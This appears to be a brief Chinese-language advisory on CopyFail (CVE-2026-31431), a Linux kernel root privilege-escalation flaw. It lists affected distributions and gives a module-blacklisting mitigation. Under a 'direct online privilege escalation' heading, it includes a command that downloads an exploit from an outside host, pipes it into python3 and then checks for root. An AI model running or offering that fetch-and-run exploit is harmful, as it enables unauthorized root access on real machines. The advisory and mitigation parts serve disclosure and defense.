2026年5月6日,Linux内核7.0及更早版本被曝存在高危漏洞CopyFail(CVE-2026-31431),攻击者可借其由低权限提权至root。
该漏洞于3月下旬披露,补丁已发布但尚未全面推送。
美国CISA要求联邦机构于5月15日前完成修复。漏洞影响红帽RHEL 10.1、Ubuntu 24.04、Amazon Linux 2023、SUSE 16等主流发行版,亦波及Kubernetes及容器环境。
虽无法直接远程利用,但可与远程漏洞组合攻击或通过恶意链接、供应链投毒触发。
临时修复方案
sudo tee /etc/modprobe.d/disable-algif-aead.conf <<<'install algif_aead /bin/false'
sudo rmmod algif_aead 2>/dev/null
在线直接提权
curl https://copy.fail/exp | python3
su
id
漏洞影响系统
该漏洞影响默认启用或可加载algifaead模块的Linux系统,已知受影响的产品如下:
1.Ubuntu24.04LTS 及 以 下;
2.AmazonLinux2023及以 下;
3.RedHatEnterpriseLinux10及 以 下;
4.RedHatEnterpriseLinux9及 以 下;
5.RedHatEnterpriseLinux8及 以 下;
6.SUSE16及以下;
7.Debian/Arch/Fedora/Rocky/Alma/Oracle等同期内核版本;
8.统信(UOS)1070、1060;
9.麒麟(Kylin)V11、V10;
10.openEuler 24.03 (LTS-SP1);